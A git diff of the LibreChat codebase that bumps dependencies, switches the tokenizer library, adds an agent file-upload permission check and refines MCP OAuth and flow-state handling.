"resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.6.tgz", "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.6.tgz",
@ -28803,9 +28898,9 @@
"integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==" "integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ=="
}, },
"node_modules/hono": { "node_modules/hono": {
"version": "4.12.5", "version": "4.12.7",
"resolved": "https://registry.npmjs.org/hono/-/hono-4.12.5.tgz", "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.7.tgz",
"integrity": "sha512-3qq+FUBtlTHhtYxbxheZgY8NIFnkkC/MR8u5TTsr7YZ3wixryQ3cCwn3iZbg8p8B88iDBBAYSfZDS75t8MN7Vg==", "integrity": "sha512-jq9l1DM0zVIvsm3lv9Nw9nlJnMNPOcAtsbsgiUhWcFzPE99Gvo6yRTlszSLLYacMeQ6quHD6hMfId8crVHvexw==",
"license": "MIT", "license": "MIT",
"engines": { "engines": {
"node": ">=16.9.0" "node": ">=16.9.0"
@ -35688,18 +35783,6 @@
"node-readable-to-web-readable-stream": "^0.4.2" "node-readable-to-web-readable-stream": "^0.4.2"
} }
}, },
"node_modules/peek-readable": {
"version": "5.0.0",
"resolved": "https://registry.npmjs.org/peek-readable/-/peek-readable-5.0.0.tgz",
"integrity": "sha512-YtCKvLUOvwtMGmrniQPdO7MwPjgkFBtFIrmfSbYmYuq3tKDV/mcfAhBth1+C3ru7uXIZasc/pHnb+YDYNkkj4A==",
"engines": {
"node": ">=14.16"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/pend": { "node_modules/pend": {
"version": "1.2.0", "version": "1.2.0",
"resolved": "https://registry.npmjs.org/pend/-/pend-1.2.0.tgz", "resolved": "https://registry.npmjs.org/pend/-/pend-1.2.0.tgz",
@ -38505,21 +38588,6 @@
"node": ">= 6" "node": ">= 6"
} }
}, },
"node_modules/readable-web-to-node-stream": {
"version": "3.0.2",
"resolved": "https://registry.npmjs.org/readable-web-to-node-stream/-/readable-web-to-node-stream-3.0.2.tgz",
"integrity": "sha512-ePeK6cc1EcKLEhJFt/AebMCLL+GgSKhuygrZ/GLaKZYEecIgIECf4UaUuaByiGtzckwR4ain9VzUh95T1exYGw==",
"dependencies": {
"readable-stream": "^3.6.0"
},
"engines": {
"node": ">=8"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/readdirp": { "node_modules/readdirp": {
"version": "3.6.0", "version": "3.6.0",
"resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz", "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz",
@ -40906,22 +40974,6 @@
], ],
"license": "MIT" "license": "MIT"
}, },
"node_modules/strtok3": {
"version": "7.0.0",
"resolved": "https://registry.npmjs.org/strtok3/-/strtok3-7.0.0.tgz",
"integrity": "sha512-pQ+V+nYQdC5H3Q7qBZAz/MO6lwGhoC2gOAjuouGf/VO0m7vQRh8QNMl2Uf6SwAtzZ9bOw3UIeBukEGNJl5dtXQ==",
"dependencies": {
"@tokenizer/token": "^0.3.0",
"peek-readable": "^5.0.0"
},
"engines": {
"node": ">=14.16"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/style-inject": { "node_modules/style-inject": {
"version": "0.3.0", "version": "0.3.0",
"resolved": "https://registry.npmjs.org/style-inject/-/style-inject-0.3.0.tgz", "resolved": "https://registry.npmjs.org/style-inject/-/style-inject-0.3.0.tgz",
@ -41485,11 +41537,6 @@
"node": ">=0.8" "node": ">=0.8"
} }
}, },
"node_modules/tiktoken": {
"version": "1.0.15",
"resolved": "https://registry.npmjs.org/tiktoken/-/tiktoken-1.0.15.tgz",
"integrity": "sha512-sCsrq/vMWUSEW29CJLNmPvWxlVp7yh2tlkAjpJltIKqp5CKf98ZNpdeHRmAlPVFlGEbswDc6SmI8vz64W/qErw=="
},
"node_modules/timers-browserify": { "node_modules/timers-browserify": {
"version": "2.0.12", "version": "2.0.12",
"resolved": "https://registry.npmjs.org/timers-browserify/-/timers-browserify-2.0.12.tgz", "resolved": "https://registry.npmjs.org/timers-browserify/-/timers-browserify-2.0.12.tgz",
@ -41631,22 +41678,6 @@
"node": ">=0.6" "node": ">=0.6"
} }
}, },
"node_modules/token-types": {
"version": "5.0.1",
"resolved": "https://registry.npmjs.org/token-types/-/token-types-5.0.1.tgz",
"integrity": "sha512-Y2fmSnZjQdDb9W4w4r1tswlMHylzWIeOKpx0aZH9BgGtACHhrk3OkT52AzwcuqTRBZtvvnTjDBh8eynMulu8Vg==",
"dependencies": {
"@tokenizer/token": "^0.3.0",
"ieee754": "^1.2.1"
},
"engines": {
"node": ">=14.16"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/touch": { "node_modules/touch": {
"version": "3.1.0", "version": "3.1.0",
"resolved": "https://registry.npmjs.org/touch/-/touch-3.1.0.tgz", "resolved": "https://registry.npmjs.org/touch/-/touch-3.1.0.tgz",
@ -42197,6 +42228,18 @@
"resolved": "https://registry.npmjs.org/uid2/-/uid2-0.0.4.tgz", "resolved": "https://registry.npmjs.org/uid2/-/uid2-0.0.4.tgz",
"integrity": "sha512-IevTus0SbGwQzYh3+fRsAMTVVPOoIVufzacXcHPmdlle1jUpq7BRL+mw3dgeLanvGZdwwbWhRV6XrcFNdBmjWA==" "integrity": "sha512-IevTus0SbGwQzYh3+fRsAMTVVPOoIVufzacXcHPmdlle1jUpq7BRL+mw3dgeLanvGZdwwbWhRV6XrcFNdBmjWA=="
}, },
"node_modules/uint8array-extras": {
"version": "1.5.0",
"resolved": "https://registry.npmjs.org/uint8array-extras/-/uint8array-extras-1.5.0.tgz",
"integrity": "sha512-rvKSBiC5zqCCiDZ9kAOszZcDvdAHwwIKJG33Ykj43OKcWsnmcBRL09YTU4nOeHZ8Y2a7l1MgTd08SBe9A8Qj6A==",
"license": "MIT",
"engines": {
"node": ">=18"
},
"funding": {
"url": "https://github.com/sponsors/sindresorhus"
}
},
"node_modules/unbox-primitive": { "node_modules/unbox-primitive": {
"version": "1.1.0", "version": "1.1.0",
"resolved": "https://registry.npmjs.org/unbox-primitive/-/unbox-primitive-1.1.0.tgz", "resolved": "https://registry.npmjs.org/unbox-primitive/-/unbox-primitive-1.1.0.tgz",
@ -42229,9 +42272,9 @@
"license": "MIT" "license": "MIT"
}, },
"node_modules/undici": { "node_modules/undici": {
"version": "7.20.0", "version": "7.24.1",
"resolved": "https://registry.npmjs.org/undici/-/undici-7.20.0.tgz", "resolved": "https://registry.npmjs.org/undici/-/undici-7.24.1.tgz",
"integrity": "sha512-MJZrkjyd7DeC+uPZh+5/YaMDxFiiEEaDgbUSVMXayofAkDWF1088CDo+2RPg7B1BuS1qf1vgNE7xqwPxE0DuSQ==", "integrity": "sha512-5xoBibbmnjlcR3jdqtY2Lnx7WbrD/tHlT01TmvqZUFVc9Q1w4+j5hbnapTqbcXITMH1ovjq/W7BkqBilHiVAaA==",
"license": "MIT", "license": "MIT",
"engines": { "engines": {
"node": ">=20.18.1" "node": ">=20.18.1"
@ -44088,9 +44131,9 @@
} }
}, },
"node_modules/yauzl": { "node_modules/yauzl": {
"version": "3.2.0", "version": "3.2.1",
"resolved": "https://registry.npmjs.org/yauzl/-/yauzl-3.2.0.tgz", "resolved": "https://registry.npmjs.org/yauzl/-/yauzl-3.2.1.tgz",
"integrity": "sha512-Ow9nuGZE+qp1u4JIPvg+uCiUr7xGQWdff7JQSk5VGYTAZMDe2q8lxJ10ygv10qmSj031Ty/6FNJpLO4o1Sgc+w==", "integrity": "sha512-k1isifdbpNSFEHFJ1ZY4YDewv0IH9FR61lDetaRMD3j2ae3bIXGV+7c+LHCqtQGofSd8PIyV4X6+dHMAnSr60A==",
"dev": true, "dev": true,
"license": "MIT", "license": "MIT",
"dependencies": { "dependencies": {
@ -44200,6 +44243,7 @@
"@librechat/data-schemas": "*", "@librechat/data-schemas": "*",
"@modelcontextprotocol/sdk": "^1.27.1", "@modelcontextprotocol/sdk": "^1.27.1",
"@smithy/node-http-handler": "^4.4.5", "@smithy/node-http-handler": "^4.4.5",
"ai-tokenizer": "^1.0.6",
"axios": "^1.13.5", "axios": "^1.13.5",
"connect-redis": "^8.1.0", "connect-redis": "^8.1.0",
"eventsource": "^3.0.2", "eventsource": "^3.0.2",
@ -44222,8 +44266,7 @@
"node-fetch": "2.7.0", "node-fetch": "2.7.0",
"pdfjs-dist": "^5.4.624", "pdfjs-dist": "^5.4.624",
"rate-limit-redis": "^4.2.0", "rate-limit-redis": "^4.2.0",
"tiktoken": "^1.0.15", "undici": "^7.24.1",
"undici": "^7.18.2",
"zod": "^3.22.4" "zod": "^3.22.4"
} }
}, },

View file

@ -7,6 +7,7 @@ export default {
'\\.dev\\.ts$', '\\.dev\\.ts$',
'\\.helper\\.ts$', '\\.helper\\.ts$',
'\\.helper\\.d\\.ts$', '\\.helper\\.d\\.ts$',
'/__tests__/helpers/',
], ],
coverageReporters: ['text', 'cobertura'], coverageReporters: ['text', 'cobertura'],
testResultsProcessor: 'jest-junit', testResultsProcessor: 'jest-junit',

View file

@ -18,8 +18,8 @@
"build:dev": "npm run clean && NODE_ENV=development rollup -c --bundleConfigAsCjs", "build:dev": "npm run clean && NODE_ENV=development rollup -c --bundleConfigAsCjs",
"build:watch": "NODE_ENV=development rollup -c -w --bundleConfigAsCjs", "build:watch": "NODE_ENV=development rollup -c -w --bundleConfigAsCjs",
"build:watch:prod": "rollup -c -w --bundleConfigAsCjs", "build:watch:prod": "rollup -c -w --bundleConfigAsCjs",
"test": "jest --coverage --watch --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.\"", "test": "jest --coverage --watch --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.|__tests__/helpers/\"",
"test:ci": "jest --coverage --ci --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.\"", "test:ci": "jest --coverage --ci --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.|__tests__/helpers/\"",
"test:cache-integration:core": "jest --testPathPatterns=\"src/cache/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false", "test:cache-integration:core": "jest --testPathPatterns=\"src/cache/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false",
"test:cache-integration:cluster": "jest --testPathPatterns=\"src/cluster/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false --runInBand", "test:cache-integration:cluster": "jest --testPathPatterns=\"src/cluster/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false --runInBand",
"test:cache-integration:mcp": "jest --testPathPatterns=\"src/mcp/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false", "test:cache-integration:mcp": "jest --testPathPatterns=\"src/mcp/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false",
@ -94,6 +94,7 @@
"@librechat/data-schemas": "*", "@librechat/data-schemas": "*",
"@modelcontextprotocol/sdk": "^1.27.1", "@modelcontextprotocol/sdk": "^1.27.1",
"@smithy/node-http-handler": "^4.4.5", "@smithy/node-http-handler": "^4.4.5",
"ai-tokenizer": "^1.0.6",
"axios": "^1.13.5", "axios": "^1.13.5",
"connect-redis": "^8.1.0", "connect-redis": "^8.1.0",
"eventsource": "^3.0.2", "eventsource": "^3.0.2",
@ -116,8 +117,7 @@
"node-fetch": "2.7.0", "node-fetch": "2.7.0",
"pdfjs-dist": "^5.4.624", "pdfjs-dist": "^5.4.624",
"rate-limit-redis": "^4.2.0", "rate-limit-redis": "^4.2.0",
"tiktoken": "^1.0.15", "undici": "^7.24.1",
"undici": "^7.18.2",
"zod": "^3.22.4" "zod": "^3.22.4"
} }
} }

View file

@ -22,8 +22,9 @@ jest.mock('winston', () => ({
})); }));
// Mock the Tokenizer // Mock the Tokenizer
jest.mock('~/utils', () => ({ jest.mock('~/utils/tokenizer', () => ({
Tokenizer: { __esModule: true,
default: {
getTokenCount: jest.fn((text: string) => text.length), // Simple mock: 1 char = 1 token getTokenCount: jest.fn((text: string) => text.length), // Simple mock: 1 char = 1 token
}, },
})); }));

View file

@ -19,7 +19,8 @@ import type { TAttachment, MemoryArtifact } from 'librechat-data-provider';
import type { BaseMessage, ToolMessage } from '@langchain/core/messages'; import type { BaseMessage, ToolMessage } from '@langchain/core/messages';
import type { Response as ServerResponse } from 'express'; import type { Response as ServerResponse } from 'express';
import { GenerationJobManager } from '~/stream/GenerationJobManager'; import { GenerationJobManager } from '~/stream/GenerationJobManager';
import { Tokenizer, resolveHeaders, createSafeUser } from '~/utils'; import { resolveHeaders, createSafeUser } from '~/utils';
import Tokenizer from '~/utils/tokenizer';
type RequiredMemoryMethods = Pick< type RequiredMemoryMethods = Pick<
MemoryMethods, MemoryMethods,

View file

@ -32,14 +32,22 @@ describe('LeaderElection with Redis', () => {
process.setMaxListeners(200); process.setMaxListeners(200);
}); });
afterEach(async () => { beforeEach(async () => {
await Promise.all(instances.map((instance) => instance.resign()));
instances = [];
// Clean up: clear the leader key directly from Redis
if (keyvRedisClient) { if (keyvRedisClient) {
await keyvRedisClient.del(LeaderElection.LEADER_KEY); await keyvRedisClient.del(LeaderElection.LEADER_KEY);
} }
new LeaderElection().clearRefreshTimer();
});
afterEach(async () => {
try {
await Promise.all(instances.map((instance) => instance.resign()));
} finally {
instances = [];
if (keyvRedisClient) {
await keyvRedisClient.del(LeaderElection.LEADER_KEY);
}
}
}); });
afterAll(async () => { afterAll(async () => {

View file

@ -0,0 +1,113 @@
import type { IUser } from '@librechat/data-schemas';
import type { Response } from 'express';
import type { Types } from 'mongoose';
import { logger } from '@librechat/data-schemas';
import { SystemRoles, ResourceType, PermissionBits } from 'librechat-data-provider';
import type { ServerRequest } from '~/types';
export type AgentUploadAuthResult =
| { allowed: true }
| { allowed: false; status: number; error: string; message: string };
export interface AgentUploadAuthParams {
userId: string;
userRole: string;
agentId?: string;
toolResource?: string | null;
messageFile?: boolean | string;
}
export interface AgentUploadAuthDeps {
getAgent: (params: { id: string }) => Promise<{
_id: string | Types.ObjectId;
author?: string | Types.ObjectId | null;
} | null>;
checkPermission: (params: {
userId: string;
role: string;
resourceType: ResourceType;
resourceId: string | Types.ObjectId;
requiredPermission: number;
}) => Promise<boolean>;
}
export async function checkAgentUploadAuth(
params: AgentUploadAuthParams,
deps: AgentUploadAuthDeps,
): Promise<AgentUploadAuthResult> {
const { userId, userRole, agentId, toolResource, messageFile } = params;
const { getAgent, checkPermission } = deps;
const isMessageAttachment = messageFile === true || messageFile === 'true';
if (!agentId || toolResource == null || isMessageAttachment) {
return { allowed: true };
}
if (userRole === SystemRoles.ADMIN) {
return { allowed: true };
}
const agent = await getAgent({ id: agentId });
if (!agent) {
return { allowed: false, status: 404, error: 'Not Found', message: 'Agent not found' };
}
if (agent.author?.toString() === userId) {
return { allowed: true };
}
const hasEditPermission = await checkPermission({
userId,
role: userRole,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
requiredPermission: PermissionBits.EDIT,
});
if (hasEditPermission) {
return { allowed: true };
}
logger.warn(
`[agentUploadAuth] User ${userId} denied upload to agent ${agentId} (insufficient permissions)`,
);
return {
allowed: false,
status: 403,
error: 'Forbidden',
message: 'Insufficient permissions to upload files to this agent',
};
}
/** @returns true if denied (response already sent), false if allowed */
export async function verifyAgentUploadPermission({
req,
res,
metadata,
getAgent,
checkPermission,
}: {
req: ServerRequest;
res: Response;
metadata: { agent_id?: string; tool_resource?: string | null; message_file?: boolean | string };
getAgent: AgentUploadAuthDeps['getAgent'];
checkPermission: AgentUploadAuthDeps['checkPermission'];
}): Promise<boolean> {
const user = req.user as IUser;
const result = await checkAgentUploadAuth(
{
userId: user.id,
userRole: user.role ?? '',
agentId: metadata.agent_id,
toolResource: metadata.tool_resource,
messageFile: metadata.message_file,
},
{ getAgent, checkPermission },
);
if (!result.allowed) {
res.status(result.status).json({ error: result.error, message: result.message });
return true;
}
return false;
}

View file

@ -0,0 +1 @@
export * from './auth';

View file

@ -1,3 +1,4 @@
export * from './agents';
export * from './audio'; export * from './audio';
export * from './context'; export * from './context';
export * from './documents/crud'; export * from './documents/crud';

View file

@ -3,6 +3,18 @@ import { logger } from '@librechat/data-schemas';
import type { StoredDataNoRaw } from 'keyv'; import type { StoredDataNoRaw } from 'keyv';
import type { FlowState, FlowMetadata, FlowManagerOptions } from './types'; import type { FlowState, FlowMetadata, FlowManagerOptions } from './types';
export const PENDING_STALE_MS = 2 * 60 * 1000;
const SECONDS_THRESHOLD = 1e10;
/**
* Normalizes an expiration timestamp to milliseconds.
* Timestamps below 10 billion are assumed to be in seconds (valid until ~2286).
*/
export function normalizeExpiresAt(timestamp: number): number {
return timestamp < SECONDS_THRESHOLD ? timestamp * 1000 : timestamp;
}
export class FlowStateManager<T = unknown> { export class FlowStateManager<T = unknown> {
private keyv: Keyv; private keyv: Keyv;
private ttl: number; private ttl: number;
@ -45,32 +57,8 @@ export class FlowStateManager<T = unknown> {
return `${type}:${flowId}`; return `${type}:${flowId}`;
} }
/**
* Normalizes an expiration timestamp to milliseconds.
* Detects whether the input is in seconds or milliseconds based on magnitude.
* Timestamps below 10 billion are assumed to be in seconds (valid until ~2286).
* @param timestamp - The expiration timestamp (in seconds or milliseconds)
* @returns The timestamp normalized to milliseconds
*/
private normalizeExpirationTimestamp(timestamp: number): number {
const SECONDS_THRESHOLD = 1e10;
if (timestamp < SECONDS_THRESHOLD) {
return timestamp * 1000;
}
return timestamp;
}
/**
* Checks if a flow's token has expired based on its expires_at field
* @param flowState - The flow state to check
* @returns true if the token has expired, false otherwise (including if no expires_at exists)
*/
private isTokenExpired(flowState: FlowState<T> | undefined): boolean { private isTokenExpired(flowState: FlowState<T> | undefined): boolean {
if (!flowState?.result) { if (!flowState?.result || typeof flowState.result !== 'object') {
return false;
}
if (typeof flowState.result !== 'object') {
return false; return false;
} }
@ -79,13 +67,11 @@ export class FlowStateManager<T = unknown> {
} }
const expiresAt = (flowState.result as { expires_at: unknown }).expires_at; const expiresAt = (flowState.result as { expires_at: unknown }).expires_at;
if (typeof expiresAt !== 'number' || !Number.isFinite(expiresAt)) { if (typeof expiresAt !== 'number' || !Number.isFinite(expiresAt)) {
return false; return false;
} }
const normalizedExpiresAt = this.normalizeExpirationTimestamp(expiresAt); return normalizeExpiresAt(expiresAt) < Date.now();
return normalizedExpiresAt < Date.now();
} }
/** /**
@ -149,6 +135,8 @@ export class FlowStateManager<T = unknown> {
let elapsedTime = 0; let elapsedTime = 0;
let isCleanedUp = false; let isCleanedUp = false;
let intervalId: NodeJS.Timeout | null = null; let intervalId: NodeJS.Timeout | null = null;
let missingStateRetried = false;
let isRetrying = false;
// Cleanup function to avoid duplicate cleanup // Cleanup function to avoid duplicate cleanup
const cleanup = () => { const cleanup = () => {
@ -188,17 +176,30 @@ export class FlowStateManager<T = unknown> {
} }
intervalId = setInterval(async () => { intervalId = setInterval(async () => {
if (isCleanedUp) return; if (isCleanedUp || isRetrying) return;
try { try {
const flowState = (await this.keyv.get(flowKey)) as FlowState<T> | undefined; let flowState = (await this.keyv.get(flowKey)) as FlowState<T> | undefined;
if (!flowState) {
if (!missingStateRetried) {
missingStateRetried = true;
isRetrying = true;
logger.warn(
`[${flowKey}] Flow state not found, retrying once after 500ms (race recovery)`,
);
await new Promise((r) => setTimeout(r, 500));
flowState = (await this.keyv.get(flowKey)) as FlowState<T> | undefined;
isRetrying = false;
}
if (!flowState) { if (!flowState) {
cleanup(); cleanup();
logger.error(`[${flowKey}] Flow state not found`); logger.error(`[${flowKey}] Flow state not found after retry`);
reject(new Error(`${type} Flow state not found`)); reject(new Error(`${type} Flow state not found`));
return; return;
} }
}
if (signal?.aborted) { if (signal?.aborted) {
cleanup(); cleanup();
@ -251,10 +252,10 @@ export class FlowStateManager<T = unknown> {
const flowState = (await this.keyv.get(flowKey)) as FlowState<T> | undefined; const flowState = (await this.keyv.get(flowKey)) as FlowState<T> | undefined;
if (!flowState) { if (!flowState) {
logger.warn('[FlowStateManager] Cannot complete flow - flow state not found', { logger.warn(
flowId, '[FlowStateManager] Flow state not found during completion — cannot recover metadata, skipping',
type, { flowId, type },
}); );
return false; return false;
} }
@ -297,7 +298,7 @@ export class FlowStateManager<T = unknown> {
async isFlowStale( async isFlowStale(
flowId: string, flowId: string,
type: string, type: string,
staleThresholdMs: number = 2 * 60 * 1000, staleThresholdMs: number = PENDING_STALE_MS,
): Promise<{ isStale: boolean; age: number; status?: string }> { ): Promise<{ isStale: boolean; age: number; status?: string }> {
const flowKey = this.getFlowKey(flowId, type); const flowKey = this.getFlowKey(flowId, type);
const flowState = (await this.keyv.get(flowKey)) as FlowState<T> | undefined; const flowState = (await this.keyv.get(flowKey)) as FlowState<T> | undefined;

View file

@ -15,6 +15,8 @@ export * from './mcp/errors';
/* Utilities */ /* Utilities */
export * from './mcp/utils'; export * from './mcp/utils';
export * from './utils'; export * from './utils';
export { default as Tokenizer, countTokens } from './utils/tokenizer';
export type { EncodingName } from './utils/tokenizer';
export * from './db/utils'; export * from './db/utils';
/* OAuth */ /* OAuth */
export * from './oauth'; export * from './oauth';

View file

@ -2,11 +2,11 @@ import { logger } from '@librechat/data-schemas';
import type { OAuthClientInformation } from '@modelcontextprotocol/sdk/shared/auth.js'; import type { OAuthClientInformation } from '@modelcontextprotocol/sdk/shared/auth.js';
import type { Tool } from '@modelcontextprotocol/sdk/types.js'; import type { Tool } from '@modelcontextprotocol/sdk/types.js';
import type { TokenMethods } from '@librechat/data-schemas'; import type { TokenMethods } from '@librechat/data-schemas';
import type { MCPOAuthTokens, OAuthMetadata } from '~/mcp/oauth'; import type { MCPOAuthTokens, OAuthMetadata, MCPOAuthFlowMetadata } from '~/mcp/oauth';
import type { FlowStateManager } from '~/flow/manager'; import type { FlowStateManager } from '~/flow/manager';
import type { FlowMetadata } from '~/flow/types';
import type * as t from './types'; import type * as t from './types';
import { MCPTokenStorage, MCPOAuthHandler } from '~/mcp/oauth'; import { MCPTokenStorage, MCPOAuthHandler, ReauthenticationRequiredError } from '~/mcp/oauth';
import { PENDING_STALE_MS, normalizeExpiresAt } from '~/flow/manager';
import { sanitizeUrlForLogging } from './utils'; import { sanitizeUrlForLogging } from './utils';
import { withTimeout } from '~/utils/promise'; import { withTimeout } from '~/utils/promise';
import { MCPConnection } from './connection'; import { MCPConnection } from './connection';
@ -104,6 +104,7 @@ export class MCPConnectionFactory {
return { tools, connection, oauthRequired: false, oauthUrl: null }; return { tools, connection, oauthRequired: false, oauthUrl: null };
} }
} catch { } catch {
MCPConnection.decrementCycleCount(this.serverName);
logger.debug( logger.debug(
`${this.logPrefix} [Discovery] Connection failed, attempting unauthenticated tool listing`, `${this.logPrefix} [Discovery] Connection failed, attempting unauthenticated tool listing`,
); );
@ -125,7 +126,9 @@ export class MCPConnectionFactory {
} }
return { tools, connection: null, oauthRequired, oauthUrl }; return { tools, connection: null, oauthRequired, oauthUrl };
} }
MCPConnection.decrementCycleCount(this.serverName);
} catch (listError) { } catch (listError) {
MCPConnection.decrementCycleCount(this.serverName);
logger.debug(`${this.logPrefix} [Discovery] Unauthenticated tool listing failed:`, listError); logger.debug(`${this.logPrefix} [Discovery] Unauthenticated tool listing failed:`, listError);
} }
@ -265,6 +268,10 @@ export class MCPConnectionFactory {
if (tokens) logger.info(`${this.logPrefix} Loaded OAuth tokens`); if (tokens) logger.info(`${this.logPrefix} Loaded OAuth tokens`);
return tokens; return tokens;
} catch (error) { } catch (error) {
if (error instanceof ReauthenticationRequiredError) {
logger.info(`${this.logPrefix} ${error.message}, will trigger OAuth flow`);
return null;
}
logger.debug(`${this.logPrefix} No existing tokens found or error loading tokens`, error); logger.debug(`${this.logPrefix} No existing tokens found or error loading tokens`, error);
return null; return null;
} }
@ -306,13 +313,23 @@ export class MCPConnectionFactory {
const existingFlow = await this.flowManager!.getFlowState(flowId, 'mcp_oauth'); const existingFlow = await this.flowManager!.getFlowState(flowId, 'mcp_oauth');
if (existingFlow?.status === 'PENDING') { if (existingFlow?.status === 'PENDING') {
const pendingAge = existingFlow.createdAt
? Date.now() - existingFlow.createdAt
: Infinity;
if (pendingAge < PENDING_STALE_MS) {
logger.debug( logger.debug(
`${this.logPrefix} PENDING OAuth flow already exists, skipping new initiation`, `${this.logPrefix} Recent PENDING OAuth flow exists (${Math.round(pendingAge / 1000)}s old), skipping new initiation`,
); );
connection.emit('oauthFailed', new Error('OAuth flow initiated - return early')); connection.emit('oauthFailed', new Error('OAuth flow initiated - return early'));
return; return;
} }
logger.debug(
`${this.logPrefix} Found stale PENDING OAuth flow (${Math.round(pendingAge / 1000)}s old), will replace`,
);
}
const { const {
authorizationUrl, authorizationUrl,
flowId: newFlowId, flowId: newFlowId,
@ -326,11 +343,17 @@ export class MCPConnectionFactory {
); );
if (existingFlow) { if (existingFlow) {
const oldState = (existingFlow.metadata as MCPOAuthFlowMetadata)?.state;
await this.flowManager!.deleteFlow(newFlowId, 'mcp_oauth'); await this.flowManager!.deleteFlow(newFlowId, 'mcp_oauth');
if (oldState) {
await MCPOAuthHandler.deleteStateMapping(oldState, this.flowManager!);
}
} }
// Store flow state BEFORE redirecting so the callback can find it // Store flow state BEFORE redirecting so the callback can find it
await this.flowManager!.initFlow(newFlowId, 'mcp_oauth', flowMetadata); const metadataWithUrl = { ...flowMetadata, authorizationUrl };
await this.flowManager!.initFlow(newFlowId, 'mcp_oauth', metadataWithUrl);
await MCPOAuthHandler.storeStateMapping(flowMetadata.state, newFlowId, this.flowManager!);
// Start monitoring in background — createFlow will find the existing PENDING state // Start monitoring in background — createFlow will find the existing PENDING state
// written by initFlow above, so metadata arg is unused (pass {} to make that explicit) // written by initFlow above, so metadata arg is unused (pass {} to make that explicit)
@ -495,11 +518,75 @@ export class MCPConnectionFactory {
const existingFlow = await this.flowManager.getFlowState(flowId, 'mcp_oauth'); const existingFlow = await this.flowManager.getFlowState(flowId, 'mcp_oauth');
if (existingFlow) { if (existingFlow) {
const flowMeta = existingFlow.metadata as MCPOAuthFlowMetadata | undefined;
if (existingFlow.status === 'PENDING') {
const pendingAge = existingFlow.createdAt
? Date.now() - existingFlow.createdAt
: Infinity;
if (pendingAge < PENDING_STALE_MS) {
logger.debug(
`${this.logPrefix} Found recent PENDING OAuth flow (${Math.round(pendingAge / 1000)}s old), joining instead of creating new one`,
);
const storedAuthUrl = flowMeta?.authorizationUrl;
if (storedAuthUrl && typeof this.oauthStart === 'function') {
logger.info(
`${this.logPrefix} Re-issuing stored authorization URL to caller while joining PENDING flow`,
);
await this.oauthStart(storedAuthUrl);
}
const tokens = await this.flowManager.createFlow(flowId, 'mcp_oauth', {}, this.signal);
if (typeof this.oauthEnd === 'function') {
await this.oauthEnd();
}
logger.info(
`${this.logPrefix} Joined existing OAuth flow completed for ${this.serverName}`,
);
return {
tokens,
clientInfo: flowMeta?.clientInfo,
metadata: flowMeta?.metadata,
};
}
logger.debug(
`${this.logPrefix} Found stale PENDING OAuth flow (${Math.round(pendingAge / 1000)}s old), will delete and start fresh`,
);
}
if (existingFlow.status === 'COMPLETED') {
const completedAge = existingFlow.completedAt
? Date.now() - existingFlow.completedAt
: Infinity;
const cachedTokens = existingFlow.result as MCPOAuthTokens | null | undefined;
const isTokenExpired =
cachedTokens?.expires_at != null &&
normalizeExpiresAt(cachedTokens.expires_at) < Date.now();
if (completedAge <= PENDING_STALE_MS && cachedTokens !== undefined && !isTokenExpired) {
logger.debug(
`${this.logPrefix} Found non-stale COMPLETED OAuth flow, reusing cached tokens`,
);
return {
tokens: cachedTokens,
clientInfo: flowMeta?.clientInfo,
metadata: flowMeta?.metadata,
};
}
}
logger.debug( logger.debug(
`${this.logPrefix} Found existing OAuth flow (status: ${existingFlow.status}), cleaning up to start fresh`, `${this.logPrefix} Found existing OAuth flow (status: ${existingFlow.status}), cleaning up to start fresh`,
); );
try { try {
const oldState = flowMeta?.state;
await this.flowManager.deleteFlow(flowId, 'mcp_oauth'); await this.flowManager.deleteFlow(flowId, 'mcp_oauth');
if (oldState) {
await MCPOAuthHandler.deleteStateMapping(oldState, this.flowManager);
}
} catch (error) { } catch (error) {
logger.warn(`${this.logPrefix} Failed to clean up existing OAuth flow`, error); logger.warn(`${this.logPrefix} Failed to clean up existing OAuth flow`, error);
} }
@ -519,7 +606,9 @@ export class MCPConnectionFactory {
); );
// Store flow state BEFORE redirecting so the callback can find it // Store flow state BEFORE redirecting so the callback can find it
await this.flowManager.initFlow(newFlowId, 'mcp_oauth', flowMetadata as FlowMetadata); const metadataWithUrl = { ...flowMetadata, authorizationUrl };
await this.flowManager.initFlow(newFlowId, 'mcp_oauth', metadataWithUrl);
await MCPOAuthHandler.storeStateMapping(flowMetadata.state, newFlowId, this.flowManager);
if (typeof this.oauthStart === 'function') { if (typeof this.oauthStart === 'function') {
logger.info(`${this.logPrefix} OAuth flow started, issued authorization URL to user`); logger.info(`${this.logPrefix} OAuth flow started, issued authorization URL to user`);

View file

@ -1,10 +1,10 @@
import { logger } from '@librechat/data-schemas'; import { logger } from '@librechat/data-schemas';
import { ErrorCode, McpError } from '@modelcontextprotocol/sdk/types.js'; import { ErrorCode, McpError } from '@modelcontextprotocol/sdk/types.js';
import { MCPConnectionFactory } from '~/mcp/MCPConnectionFactory';
import { MCPServersRegistry } from '~/mcp/registry/MCPServersRegistry';
import { MCPConnection } from './connection';
import type * as t from './types'; import type * as t from './types';
